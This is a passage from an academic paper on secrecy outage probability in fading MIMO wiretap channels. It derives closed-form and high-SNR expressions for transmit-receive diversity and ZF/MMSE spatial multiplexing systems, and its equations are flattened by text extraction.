https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.186 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.186 1In our context, a MIMO wiretap channel implies that there are multiple antennas at the transmitter, the legitimate receiver, and the eavesdropper. This is generally known as co-located MIMO. For a discussion on its alternative, called distributed or cooperative MIMO, readers are referred to (Dong et al., 2010; He, Man & Wang, 2011; Zou, Wang & Shen, 2013; Wang et al., 2016a). 2For this kind of channel, the channel gains are allowed to change from channel use to channel use (Poor & Schaefer, 2017). channels1 have been recently explored in the literature (Goel & Negi, 2008; Khisti & Wornell, 2010; Oggier & Hassibi, 2011; Mukherjee & Swindlehurst, 2011; Yang et al., 2013; Ferdinand, Da Costa & Latva-aho, 2013; Lin, Tsai & Lin, 2014; Wang, Wang & Ng, 2015; Schaefer & Loyka, 2015; Wang et al., 2016b; Maichalernnukul, 2018). A brief overview of these works is provided in the following subsection. Related works In Khisti & Wornell (2010), a closed-form expression for the secrecy capacity of the Gaussian MIMO wiretap channel was derived from solving a minimax problem. Meanwhile, the problem of computing the perfect secrecy capacity of such a channel was analytically investigated in Oggier & Hassibi (2011). By relaxing the assumption of perfect channel state information (CSI) used in Khisti & Wornell (2010), Oggier & Hassibi (2011), Schaefer & Loyka (2015) studied the secrecy capacity of the compound Gaussian MIMO wiretap channel. In Mukherjee & Swindlehurst (2011), a few beamforming schemes were proposed to improve the secrecy capacity of the Gaussian MIMO wiretap channel in the presence of CSI errors. With the objective of achieving perfect secrecy at the physical layer, MIMO precoding and postcoding designs using the signal-to-noise ratio (SNR) criterion were presented in Lin, Tsai & Lin (2014). In all aforementioned works, the channel was assumed to be fixed over the whole transmission time. More precisely, the channel gains for the Gaussian MIMO wiretap channel are constant. This is rarely practical for the wireless medium as multipath propagation normally makes transmission conditions vary with time (Poor & Schaefer, 2017). Such variation is called fading. In (Yang et al., 2013; Ferdinand, Da Costa & Latva- aho, 2013; Maichalernnukul, 2018), the secrecy capacity of the fading MIMO wiretap channel2 was characterized. Specifically, Yang et al. (2013) focused on the physical-layer security enhancement through transmit antenna selection in a flat-fading MIMO channel, and characterized the corresponding performance in terms of the secrecy outage probability and the probability of non-zero secrecy capacity. In the meantime, Ferdinand, Da Costa & Latva-aho (2013) analyzed the secrecy outage probability of orthogonal space–time block code (OSTBC) MIMO systems when the transmitter–receiver and transmitter- eavesdropper links experience different kinds of fading. In contrast to space–time coding (which is based on transmit diversity), transmit beamforming and receive combining (which is based on transmit-receive diversity) achieve additional array gain (Tse & Viswanath, 2005). Besides, Goel & Negi (2008) showed that multiple transmit antennas can be deployed to generate artificial noise, such that only the transmitter-eavesdropper link is degraded. This idea enables secret communication (Csiszár & Körner, 1978) and has been extended to more practical MIMO scenarios, e.g., frequency-division duplex systems (Wang, Wang & Ng, 2015) and heterogeneous cellular networks (Wang et al., 2016b). More recently, in Maichalernnukul (2018), the average secrecy capacity of transmit- receive diversity systems in the fading MIMO wiretap channel and its upper bound were derived in closed form. Nevertheless, the corresponding secrecy outage probability has not been investigated yet. There are two reasons why we should study this performance. First, Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 2/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.186 3The rationale for using these ‘‘classical’’ detection techniques for the spatial multiplexing MIMO systems is twofold. First, the ZF and MMSE detectors are the basic building blocks of advanced MIMO communication architectures (e.g., layered space–time architectures (Foschini, 1996; Seethaler, Artés & Hlawatsch, 2004) and joint transmit-receive equalizers (Palomar & Lagunas, 2003; Jiang, Li & Hager, 2005)), and have been extensively addressed in the MIMO literature (Jankiraman, 2004; Biglieri et al., 2007; Heath Jr & Lozano, 2018). Second, they have low computational complexity compared to the (optimum) maximum likelihood (ML) detector, and their performance can be very close to the ML performance for a well-conditioned MIMO channel, i.e., its condition number is near to unity (see Seethaler, Artés & Hlawatsch (2005) for more details). the closed-form results of Maichalernnukul (2018) are complicated, and from these results, it is not clear how the system parameters (e.g., the numbers of antennas at the transmitter, the legitimate receiver, and the eavesdropper) affect the secrecy performance. In fact, quantifying the secrecy outage probability at high SNR in terms of two parameters, namely secrecy diversity order and secrecy array gain, can provide insights into this effect (Yang et al., 2013). Second, it was shown in Bashar, Ding & Li (2011) that although transmit beamforming in the transmit-receive diversity systems maximizes the achievable capacity of the main channel (i.e., that for the transmitter–receiver link), they still have secrecy outages at an arbitrary target secrecy rate. The first objective of our work is to present the exact and asymptotic (high-SNR) analysis of the secrecy outage probability of these systems. It is well known that the multiple antennas of MIMO systems can be exploited to obtain spatial multiplexing, i.e., transmission of independent data streams in parallel (Tse & Viswanath, 2005). This leads to an increase in the data rate. While several key performance metrics of spatial multiplexing MIMO systems, e.g., error probability, outage and ergodic capacity, have been extensively studied in the literature (Chen & Wang, 2007; Smith, 2007; Ordóñez et al., 2007; Kumar, Caire & Moustakas, 2009; Jiang, Varanasi & Li, 2011), little is known about the secrecy performance of these systems in the fading MIMO wiretap channel. The second objective of our work is to fill this knowledge gap by providing a relevant secrecy outage probability characterization. Contributions The main contributions of this work are summarized as follows: • We derive exact and asymptotic closed-form expressions for the secrecy outage probability of a transmit-receive diversity system in the fading MIMO wiretap channel. We also do the same for the secrecy outage probability of spatial multiplexing systems with linear equalization, especially zero-forcing (ZF) and minimum mean-square-error (MMSE).3 It is shown that all exact secrecy outage results simplify to the well-known result (Bloch et al., 2008, Equation (9)) for the case where the transmitter, the legitimate receiver, and the eavesdropper have a single antenna. • We determine the secrecy diversity order and secrecy array gain that the above systems achieve, and discuss the impact of the numbers of antennas at the transmitter, the legitimate receiver, and the eavesdropper, denoted as Mt, Mr, and Me, respectively, on the system secrecy and complexity. Through numerical results, it is verified that the transmit-receive diversity system attains a secrecy diversity order of MtMr, while the spatial multiplexing systems with ZF equalization and MMSE equalization yield the same secrecy diversity order of Mr−Mt+1. All of these secrecy diversity orders turn out to be independent of Me. Notation and organization Throughout this paper, we write a function g(x) of variable x as o(x) if limx→0 g(x) x =0, and denote ( · · ) as the multinomial coefficient, E[·] as the expectation operator, ddx (·) as the first derivative operator with respect to variable x, ‖·‖ as the Euclidean norm of a vector, and IN as the identity matrix of size N ×N . Moreover, det(·), (·)T, (·)†, (·)−1, and [·]ij Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 3/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.186 4This assumption holds, for example, if the receiver and eavesdropper are able to perfectly estimate Hr and He, respectively, and the receiver sends Hr to the transmitter through a noiseless broadcast channel, which can be heard by the eavesdropper (Goel & Negi, 2008). denote the determinant, transpose, conjugate transpose, inverse, and (i,j)-th element of a matrix, respectively, and ϒ(·,·) and 0(·,·) are the lower and upper incomplete gamma functions defined in (Gradshteyn & Ryzhik, 2000, Equation (8.350.1)) and (Gradshteyn & Ryzhik, 2000, Equation (8.350.2)), respectively. We also denote CN(0,K) as a zero-mean circularly-symmetric complex Gaussian distribution with covariance K (Gallager, 2008, Section 7.8.1), and Lmax{·} and P{·} as the largest eigenvalue of a square matrix and the associated eigenvector, respectively. The layout of the paper is as follows. ‘System Model’ describes the system model of interest. ‘Exact Secrecy Outage Probability’ and ‘Asymptotic Secrecy Outage Probability’ present exact and asymptotic analysis of the corresponding secrecy outage probability, respectively. ‘Numerical Results’ provides the numerical results of theoretical analysis and simulations, followed by the conclusion given in ‘Conclusion’. SYSTEM MODEL In this section, we consider transmit-receive diversity and spatial multiplexing systems where the transmitter, the legitimate receiver, and the passive eavesdropper are equipped with Mt, Mr, and Me antennas, respectively. The instantaneous secrecy capacity of these systems is given by (Bloch et al., 2008, Lemma 1) Cs= {log2(1+γr)−log2(1+γe), if γr >γe 0, if γr≤γe (1) where γr and γe are the instantaneous received SNRs at the receiver and the eavesdropper, respectively. Transmit-receive diversity system For the transmit-receive diversity system, the received signal vector at the legitimate receiver, yr ∈CMr×1, and that at the passive eavesdropper, ye ∈CMe×1, depend on the transmitted symbol s∈C (with E[|s|2]=P) according to yr=Hrwts+nr (2) and ye=Hewts+ne (3) respectively, where wt∈CMt×1 is the transmit weight (beamforming) vector, and nr and ne are independent circularly-symmetric complex-valued Gaussian noises: nr∼CN(0,σ2r IMr) and ne∼CN(0,σ2e IMe). We focus on a Rayleigh-fading wiretap channel, meaning that the channel matrices Hr and He have independent identically-distributed CN(0,1) entries. In addition, we assume that the three terminals know Hr, but He is available only at the eavesdropper.4 The receiver estimates the symbol s by applying the receive weight (combining) vector zr to the received signal vector yr: z†ryr=z † rHrwts+z † rnr. Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 4/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.186 The optimal choices of wt and zr in the sense of maximizing the SNR of this estimate (i.e., the instantaneous received SNR) are given by Dighe, Mallik & Jamuar (2003) wt= H†rzr ‖H†rzr‖ and zr=P{HrH†r} respectively, and the resultant SNR is γr,TR= γ̄rLmax{HrH†r} (4) where γ̄r = P σ2r is the average SNR at the receiver. The subscript TR refers to the transmit-receive diversity system, and is sometimes used to avoid confusion between this system and the spatial multiplexing system. Let λ=Lmax{HrH † r}, L=min(Mt,Mr), and K =max(Mt,Mr). The cumulative distribution function (CDF) of λ is given by Dighe, Mallik & Jamuar (2003) Fλ(x)= det(S(x))[∏L p=1(K −p)!(L−p)! ] (5) where S(x) is the L×L Hankel matrix with [S(x)]ij =ϒ(|Mt−Mr|+i+j−1,x). By careful inspection of the entries of S(x), this CDF can be rewritten as Fλ(x)= L∑ m=1 (Mt+Mr−2m)m∑ n=|Mt−Mr| am,n n! ϒ(n+1,mx) (6) where am,n = cm,nn! mn+1 [∏L p=1(K−p)!(L−p)! ] and cm,n is the coefficient computed by using curve fitting on the plot of ddx det(S(x)) (Dighe, Mallik & Jamuar, 2003). Using Eq. (6) and (Papoulis & Pillai, 2002, Example 5-1), the CDF of γr,TR in Eq. (4) is given by Fγr,TR(x)= L∑ m=1 (Mt+Mr−2m)m∑ n=|Mt−Mr| am,n n! ϒ ( n+1, mx γ̄r ) . (7) Similarly, the eavesdropper can estimate the symbol s as z†eye=z † eHewts+z † ene where the receive weight vector ze= Hewt ‖Hewt‖ is chosen to maximize the SNR of the estimate, yielding γe,TR= γ̄e‖Hewt‖ 2 (8) Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 5/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.186 where γ̄e = P σ2e is the average SNR at the eavesdropper. The probability density function (PDF) of γe,TR in Eq. (8) is given by Maichalernnukul (2018) fγe,TR(x)= xMe−1e− x γ̄e (Me−1)!γ̄ Me e . (9) Spatial multiplexing system Unlike the transmit-receive diversity system, the spatial multiplexing system allows the simultaneous transmission of different symbols, i.e., the ith antenna (i=1,2,...,Mt) at the transmitter is used to transmit the symbol si∈C (with E[|si|2]=P) . Let s=[s1,s2,...,sMt]T. The received signal vectors at the legitimate receiver and the passive eavesdropper are given, respectively, by yr=Hrs+nr where Hr and nr are defined in Eq. (2), and ye=Hes+ne where He and ne are defined in Eq. (3). We assume that the receiver and the eavesdropper know Hr and He, respectively, and the numbers of antennas at these two terminals (Mr and Me) are no less than the number of antennas at the transmitter (Mt). The assumption on Mt, Mr, and Me is necessary for the theoretical analysis hereafter. In order for the receiver to estimate s, the ZF or MMSE receive weight (equalizing) matrix is applied to yr. These matrices are given by Tse & Viswanath (2005) Wr,ZF= ( H†rHr )−1 H†r and Wr,MMSE= ( H†rHr+ 1 γ̄r IMt )−1 H†r. It is noteworthy that as the average SNR at the receiver grows very large, i.e., γ̄r →∞, Wr,MMSE approaches Wr,ZF. Left multiplying yr by Wr,ZF and Wr,MMSE, we obtain the ith symbol estimate (i=1,2,...,Mt), the SNRs of which are, respectively, (Jiang, Varanasi & Li, 2011) γr,ZF,i= γ̄r[( H†rHr )−1] ii (10) and γr,MMSE,i= γ̄r[( H†rHr+ 1 γ̄r IMt )−1] ii −1. (11) The CDFs of γr,ZF,i and γr,MMSE,i are given, respectively, by Chen & Wang (2007) Fγr,ZF(x)=1−e − x γ̄r Mr−Mt∑ m=0 xm m!γ̄mr (12) Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 6/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.186 and Smith (2007) Fγr,MMSE(x)=1− e− x γ̄r (x+1)Mt−1 Mr−1∑ m=0 dmx m (13) where dm= ∑m n=max(0,m−Mt+1) (Mt−1 m−n ) 1 n!γ̄nr . The symbol index i is omitted from Eqs. (12) and (13) because all the elements of Hr are statistically independent and identically distributed. Similarly, the eavesdropper performs ZF or MMSE equalization, and the resulting SNRs of the ith symbol estimate (i.e., γe,ZF,i and γe,MMSE,i) can be expressed, respectively, as Eqs. (10) and (11) with the subscript r being replaced by the subscript e. Replacing the subscript r with the subscript e in Eqs. (12) and (13), and taking the derivative of these equations with respect to x, we obtain the PDFs for γe,ZF,i and γe,MMSE,i, respectively, as fγe,ZF(x)= xMe−Mte− x γ̄e (Me−Mt)!γ̄ Me−Mt+1 e (14) and fγe,MMSE(x)= e− x γ̄e (x+1)Mt Me−1∑ m=0 gm [ xm+1 γ̄e + ( Mt+ 1 γ̄e −m−1 ) xm−mxm−1 ] (15) where gm is similar to dm, except that the subscript r is replaced by the subscript e. EXACT SECRECY OUTAGE PROBABILITY The secrecy outage probability is defined as the probability that the instantaneous secrecy capacity is less than a target secrecy rate R > 0 (Bloch et al., 2008). From Eq. (1), this performance metric can be expressed as Pout(R)=Pr{Cs <R} =Pr { γr <2 R γe+2 R −1 } = ∫ ∞ 0 fγe(v)Fγr ( 2Rv+2R−1 ) dv. (16) Transmit-receive diversity system From Eqs. (7), (9) and (16), we can derive the exact secrecy outage probability for the transmit-receive diversity system as follows: Pout,TR(R)= 1 (Me−1)!γ̄ Me e L∑ m=1 (Mt+Mr−2m)m∑ n=|Mt−Mr| am,n n! ∫ ∞ 0 vMe−1e− v γ̄e ×ϒ ( n+1, (2Rv+2R−1)m γ̄r ) dv = 1 (Me−1)!γ̄ Me e L∑ m=1 (Mt+Mr−2m)m∑ n=|Mt−Mr| am,n [∫ ∞ 0 vMe−1e− v γ̄e dv −e− (2R−1)m γ̄r n∑ k=0 ( m γ̄r )k k∑ l=0 2lR(2R−1)k−l l!(k−l)! ∫ ∞ 0 vl+Me−1e − ( 2Rm γ̄r + 1 γ̄e ) v dv ] Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 7/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.186 =1− 1 (Me−1)!γ̄ Me e L∑ m=1 (Mt+Mr−2m)m∑ n=|Mt−Mr| am,ne − (2R−1)m γ̄r n∑ k=0 ( m γ̄r )k × k∑ l=0 (l+Me−1)!2lR(2R−1)k−l l!(k−l)! ( 2Rm γ̄r + 1 γ̄e )l+Me (17) where the second equality is obtained by using (Gradshteyn & Ryzhik, 2000, Equations (1.111) and (8.352.1)), and the last equality is obtained by using (Gradshteyn & Ryzhik, 2000, Equation (3.351.3)) and (Maaref & Aïssa, 2005, Equation (11)). For the special case of Mt=Mr=Me=1, the secrecy outage probability expression in Eq. (17) reduces to Pout,TR(R)=1− γ̄re − 2R−1 γ̄r γ̄r+2Rγ̄e (18) which agrees exactly with a result given in (Bloch et al., 2008, Equation (9)). Spatial multiplexing system From Eqs. (12), (14) and (16), we can derive the exact secrecy outage probability for the spatial multiplexing system with ZF equalization as follows: Pout,ZF(R)= ∫ ∞ 0 fγe,ZF(v)dv− e− 2R−1 γ̄r (Me−Mt)!γ̄ Me−Mt+1 e Mr−Mt∑ m=0 1 m!γ̄mr × ∫ ∞ 0 (2Rv+2R−1)mvMe−Mte − ( 2R γ̄r + 1 γ̄e ) v dv =1− e− 2R−1 γ̄r (Me−Mt)!γ̄ Me−Mt+1 e Mr−Mt∑ m=0 1 γ̄mr m∑ n=0 2nR(2R−1)m−n n!(m−n)! × ∫ ∞ 0 vn+Me−Mte − ( 2R γ̄r + 1 γ̄e ) v dv =1− e− 2R−1 γ̄r (Me−Mt)! ( 2Rγ̄e γ̄r +1 )Me−Mt+1 × Mr−Mt∑ m=0 1 γ̄mr m∑ n=0 2nR(2R−1)m−n(n+Me−Mt)! n!(m−n)! ( 2R γ̄r + 1 γ̄e )n (19) where the second equality is obtained by using (Gradshteyn & Ryzhik, 2000, Equation (1.111)) and (Papoulis & Pillai, 2002, Equation (4-18)), and the last equality is obtained by using (Gradshteyn & Ryzhik, 2000, Equation (3.351.3)). For the special case of Mt=Mr=Me=1, Eq. (19) simplifies to Eq. (18). Meanwhile, the secrecy outage probability for the spatial multiplexing system with MMSE equalization can be derived from Eqs. (13), (15) and (16) as follows: Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 8/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.186 Pout,MMSE(R)= ∫ ∞ 0 fγe,MMSE(v)dv− e− 2R−1 γ̄r 2(Mt−1)R Me−1∑ m=0 gm Mr−1∑ n=0 dn × [∫ ∞ 0 (2Rv+2R−1)ne − ( 2R γ̄r + 1 γ̄e ) v (v+1)2Mt−1 × [vm+1 γ̄e + ( Mt+ 1 γ̄e −m−1 ) vm−mvm−1 ] dv ] =1− e 1 γ̄r + 1 γ̄e 2(Mt−1)R Me−1∑ m=0 gm Mr−1∑ n=0 dn n∑ k=0 ( n k ) (−1)k2(n−k)R × [ 1 γ̄e m+1∑ l1=0 ( m+1 l1 ) (−1)l1 ∫ ∞ 1 vm+n−k−l1−2Mt+2e − ( 2R γ̄r + 1 γ̄e ) v dv + ( Mt+ 1 γ̄e −m−1 ) m∑ l2=0 ( m l2 ) (−1)l2 ∫ ∞ 1 vm+n−k−l2−2Mt+1e − ( 2R γ̄r + 1 γ̄e ) v dv +m m−1∑ l3=0 ( m−1 l3 ) (−1)l3 ∫ ∞ 1 vm+n−k−l3−2Mte − ( 2R γ̄r + 1 γ̄e ) v dv ] =1− e 1 γ̄r + 1 γ̄e 2(Mt−1)R Me−1∑ m=0 gm Mr−1∑ n=0 dn n∑ k=0 ( n k ) (−1)k2(n−k)R × [ 1 γ̄e m+1∑ l1=0 ( m+1 l1 )(−1)l10(m+n−k−l1−2Mt+3, 2Rγ̄r + 1γ̄e )( 2R γ̄r + 1 γ̄e )m+n−k−l1−2Mt+3 + ( Mt+ 1 γ̄e −m−1 ) m∑ l2=0 ( m l2 )(−1)l20(m+n−k−l2−2Mt+2, 2Rγ̄r + 1γ̄e )( 2R γ̄r + 1 γ̄e )m+n−k−l2−2Mt+2 +m m−1∑ l3=0 ( m−1 l3 )(−1)l30(m+n−k−l3−2Mt+1, 2Rγ̄r + 1γ̄e )( 2R γ̄r + 1 γ̄e )m+n−k−l3−2Mt+1 ] (20) where the second equality is obtained by changing the limits of integration and using (Gradshteyn & Ryzhik, 2000, Equation (1.111)) and (Papoulis & Pillai, 2002, Equation (4-18)), and the last equality is obtained by using (Gradshteyn & Ryzhik, 2000, Equation (3.381.3)). For the special case of Mt=Mr=Me=1, Eq. (20) reduces to Eq. (18). ASYMPTOTIC SECRECY OUTAGE PROBABILITY In this section, we focus on deriving the asymptotic secrecy outage probability of the aforementioned systems as γ̄r →∞. This expression enables one to analyze the secrecy performance in the high-SNR regime through two performance indicators: secrecy diversity order and secrecy array gain (Yang et al., 2013). The secrecy diversity order indicates the slope of the secrecy outage probability versus γ̄r curve at high SNR in a log–log scale, whereas Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 9/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.186 the secrecy array gain indicates the shift of the curve with respect to the benchmark secrecy outage curve. Transmit-receive diversity system First, we look for a first-order expansion of Eq. (5), which will be immediate from a first-order expansion of det(S(x)). Following the approach outlined in (McKay, 2006, Appendix B.7) and using (Kalman, 1984, Equations (1) and (2)), it is straightforward to show that the first-order Taylor expansion of det(S(x)) around x =0 is det(S(x))= [ L∏ p=1 (K −p)![(L−p)!]2 (Mt+Mr−p)! ] xMtMr+o ( xMtMr ) . (21) Substituting Eq. (21) into Eq. (5) yields Fλ(x)= [ L∏ p=1 (L−p)! (Mt+Mr−p)! ] xMtMr+o ( xMtMr ) . (22) Using Eq. (22) and (Papoulis & Pillai, 2002, Example 5-1), the first-order expansion of the CDF of γr,TR is given by Fγr,TR(x)= [ L∏ p=1 (L−p)! (Mt+Mr−p)! ]( x γ̄r )MtMr +o (( x γ̄r )MtMr) . (23) Using Eqs. (9), (16) and (23), and following the same procedure as used in Eq. (17), an asymptotic expression for Pout,TR(R) with γ̄r→∞ is obtained as P∞out,TR(R)=(ATRγ̄r) −DTR+o ( γ̄ −DTR r ) (24) where the secrecy diversity gain is DTR=MtMr (25) and the secrecy array gain is ATR = [ 1 (Me−1)! [ L∏ p=1 (L−p)! (Mt+Mr−p)! ]MtMr∑ n=0 ( MtMr n ) ×(n+Me−1)!2 nR(2R−1)MtMr−nγ̄ne ]− 1MtMr . (26) It is clear from Eq. (25) that the secrecy diversity order is dependent on Mt and Mr, and independent of Me. It can also be seen from Eq. (26) that the eavesdropper channel has an adverse impact on the secrecy array gain. Accordingly, increasing the number of antennas at the eavesdropper lessens the secrecy array gain, thereby rising the secrecy outage probability. Spatial multiplexing system Applying (Gradshteyn & Ryzhik, 2000, Equation (1.211.1)) to the exponential function in Eq. (12) and performing some algebraic manipulations, the first-order expansion of the Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 10/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.186 CDF of γr,ZF,i can be derived as Fγr,ZF(x)= xMr−Mt+1 (Mr−Mt+1)!γ̄ Mr−Mt+1 r +o (( x γ̄r )Mr−Mt+1) . (27) Using Eqs. (14), (16) and (27), and following the same procedure as used in Eq. (19), an asymptotic expression for Pout,ZF(R) with γ̄r→∞ is obtained as P∞out,ZF(R)=(AZFγ̄r) −DZF+o ( γ̄ −DZF r ) (28) where DZF=Mr−Mt+1 (29) and AZF= [∑Mr−Mt+1 n=0 (Mr−Mt+1 n ) 2nR(2R−1)Mr−Mt+1−n(n+Me−Mt)!γ̄ne (Mr−Mt+1)!(Me−Mt)! ]− 1Mr−Mt+1 . (30) Adopting the same steps as for deriving the first-order expansion of Fγr,ZF(x), we obtain Fγr,MMSE(x)= xMr (Mr−Mt+1)!γ̄ Mr−Mt+1 r (x+1)Mt−1 +o (( x γ̄r )Mr−Mt+1) . (31) Using Eqs. (15), (16) and (31), and following the same procedure as used in Eq. (20), an asymptotic expression for Pout,MMSE(R) with γ̄r→∞ is obtained as P∞out,MMSE(R)=(AMMSEγ̄r) −DMMSE+o ( γ̄ −DMMSE r ) (32) where DMMSE=Mr−Mt+1 (33) and AMMSE = [ e 1 γ̄e 2(Mr−Mt+1)R (Mr−Mt+1)! Me−1∑ m=0 gm Mr∑ n=0 ( Mr n ) (−1)nγ̄m−n+Mr−2Mt+1e 2nR × [ γ̄e m+1∑ k1=0 ( m+1 k1 )( − 1 γ̄e )k1 0 ( m−n−k1+Mr−2Mt+3, 1 γ̄e ) +γ̄e ( Mt+ 1 γ̄e −m−1 ) m∑ k2=0 ( m k2 )( − 1 γ̄e )k2 0 ( m−n−k2+Mr−2Mt+2, 1 γ̄e ) −m m−1∑ k3=0 ( m−1 k3 )( − 1 γ̄e )k3 0 ( m−n−k3+Mr−2Mt+1, 1 γ̄e )]]− 1Mr−Mt+1 . (34) It is obvious from Eqs. (29) and (33) that the secrecy diversity orders of the spatial multiplexing systems with ZF equalization and MMSE equalization are dependent on Mt and Mr, and independent of Me. It can also be observed from Eqs. (30) and (34) that increasing Me decreases the corresponding secrecy array gains. Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 11/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.186 0 5 10 15 20 25 30 Average SNR at the receiver (dB) 10-8 10-7 10-6 10-5 10-4 10-3 10-2 10-1 100 S e cr e cy o u ta g e p ro b a b ili ty M t =2, M r =2, M e =2 M t =2, M r =2, M e =2 (simu.) M t =3, M r =1, M e =2 M t =3, M r =1, M e =2 (simu.) M t =4, M r =3, M e =3 M t =4, M r =3, M e =3 (simu.) M t =6, M r =2, M e =3 M t =6, M r =2, M e =3 (simu.) Figure 1 Secrecy outage probability of transmit-receive diversity system (Pout,TR) as a function of γ̄r. This figure shows the theoretical and simulated secrecy outage curves for the transmit-receive diversity system with different numbers of antennas at the transmitter (Mt), the legitimate receiver (Mr), and the eavesdropper (Me). The simulation results are labeled with ‘‘simu.’’. Full-size DOI: 10.7717/peerjcs.186/fig-1 NUMERICAL RESULTS In this section, we validate the preceding theoretical analysis and investigate the effect of the various system parameters. For these purposes, theoretical and simulation results are obtained by using MATLAB. Specifically, we use the closed-form expressions derived above to generate the theoretical results, and adopt the Monte Carlo method to generate the simulation results. Remember that γ̄r and γ̄e are the average SNRs at the legitimate receiver and the passive eavesdropper, respectively. Unless otherwise indicated, the SNR γ̄e is set to 10 dB, and the target secrecy rate R is set to 1 bit/s/Hz. Figure 1 shows the theoretical secrecy outage probability of the transmit-receive diversity system (computed with Eq. (17)) and its simulation counterpart (labeled with ‘‘simu.’’) against γ̄r. As seen in the figure, the theoretical and simulation results match perfectly. For a given γ̄r, when Mt+Mr =4 and Me =2, the secrecy outage probability with Mt =2 and Mr =2 is lower than that with Mt =3 and Mr =1. This is consistent with the fact that for a fixed total number of antennas at the transmitter and legitimate receiver (Mt+Mr), a more-balanced antenna configuration provides a larger diversity gain (Dighe, Mallik & Jamuar, 2003; Maaref & Aïssa, 2005). Specifically, from Eq. (25), we have DTR=4 for Mt=2 and Mr=2, and DTR =3 for Mt =3 and Mr =1. However, when MtMr =12 and Me =3, the secrecy outage probability with Mt =4 and Mr =3 is higher than that with Mt =6 and Mr =2. Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 12/21 https://peerj.com https://doi.org/10.7717/peerjcs.186/fig-1 http://dx.doi.org/10.7717/peerj-cs.186 0 5 10 15 20 25 30 10 −8 10 −7 10 −6 10 −5 10 −4 10 −3 10 −2 10 −1 10 0 Average SNR at the receiver (dB) S ec re cy o ut ag e pr ob ab ili ty M t =2, M r =1, M e =1 M t =4, M r =2, M e =2 M t =6, M r =3, M e =3 M t =2, M r =1, M e =2 M t =4, M r =2, M e =4 M t =6, M r =3, M e =6 M t =2, M r =1, M e =3 M t =4, M r =2, M e =6 M t =6, M r =3, M e =9 Figure 2 Pout,TR for different combinations of Mt, Mr, and Me. This figure shows the theoretical secrecy outage curves for the transmit-receive diversity system, comparing different numbers of antennas at the transmitter (Mt), the legitimate receiver (Mr), and the eavesdropper (Me). Full-size DOI: 10.7717/peerjcs.186/fig-2 The reason is that for the same product of Mt and Mr, an increase in Mt+Mr yields a performance enhancement (Dighe, Mallik & Jamuar, 2003). Figure 2 depicts the theoretical secrecy outage probability of the aforementioned system for different combinations of Mt, Mr, and Me. We observe that when (Mt,Mr) is kept fixed (i.e., at (2,1), (4,2), or (6,3)), the larger Me is, the smaller the array gain (as discussed in Eq. (26)), which worsens the secrecy outage performance. Furthermore, it can be seen that for a given γ̄r, the secrecy outage probability with (Mt,Mr,Me)=(2,1,1) is higher than that with (Mt,Mr,Me)=(4,2,2). Meanwhile, the secrecy outage probability with (Mt,Mr,Me)= (4,2,2) is higher than that with (Mt,Mr,Me)= (6,3,3). The same performance trend occurs when (Mt,Mr,Me) increases from (2,1,2) to (6,3,6) or from (2,1,3) to (6,3,9). These results reveal that adding Mt and Mr proportionally to Me is advantageous. Figure 3 verifies the asymptotic secrecy outage probability of the transmit-receive diversity system derived in Eqs. (24)–(26) at a fixed γ̄e (i.e., γ̄e =10 dB). The exact and asymptotic secrecy outage curves are labeled with ‘‘exact’’ and ‘‘asym.’’, respectively. As γ̄r grows, the asymptotic curves approach the exact ones for different values of Mt, Mr, and Me. It can also be observed that the secrecy diversity gain is MtMr, as predicted by Eq. (25), and the secrecy array gain diminishes with increasing Me, as predicted by Eq. (26). Figure 4 compares the theoretical secrecy outage results for the spatial multiplexing systems with ZF equalization (computed with Eq. (19)) and MMSE equalization (computed with Eq. (20)), and their simulation counterparts. The theoretical and simulation results Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 13/21 https://peerj.com https://doi.org/10.7717/peerjcs.186/fig-2 http://dx.doi.org/10.7717/peerj-cs.186 0 5 10 15 20 25 30 10 −10 10 −8 10 −6 10 −4 10 −2 10 0 S ec re cy ou ta ge pr ob ab ili ty Average SNR at the receiver (dB) M t =2, M r =2, M e =2 (exact) M t =2, M r =2, M e =2 (asym.) M t =2, M r =2, M e =8 (exact) M t =2, M r =2, M e =8 (asym.) M t =4, M r =3, M e =3 (exact) M t =4, M r =3, M e =3 (asym.) M t =4, M r =3, M e =12 (exact) M t =4, M r =3, M e =12 (asym.) Figure 3 Comparison of exact and asymptotic secrecy outage probability of transmit-receive diversity system. This figure shows the exact and asymptotic secrecy outage curves for the transmit-receive diversity system with different numbers of antennas at the transmitter (Mt), the legitimate receiver (Mr), and the eavesdropper (Me). The exact and asymptotic results are labeled with ‘‘exact’’ and ‘‘asym.’’, respectively. Full-size DOI: 10.7717/peerjcs.186/fig-3 0 5 10 15 20 25 30 10 −8 10 −7 10 −6 10 −5 10 −4 10 −3 10 −2 10 −1 10 0 Average SNR at the receiver (dB) S ec re cy o ut ag e pr ob ab ili ty ZF, M t =4, M r =4, M e =4 ZF, M t =4, M r =4, M e =4 (simu.) MMSE, M t =4, M r =4, M e =4 MMSE, M t =4, M r =4, M e =4 (simu.) ZF, M t =4, M r =6, M e =4 ZF, M t =4, M r =6, M e 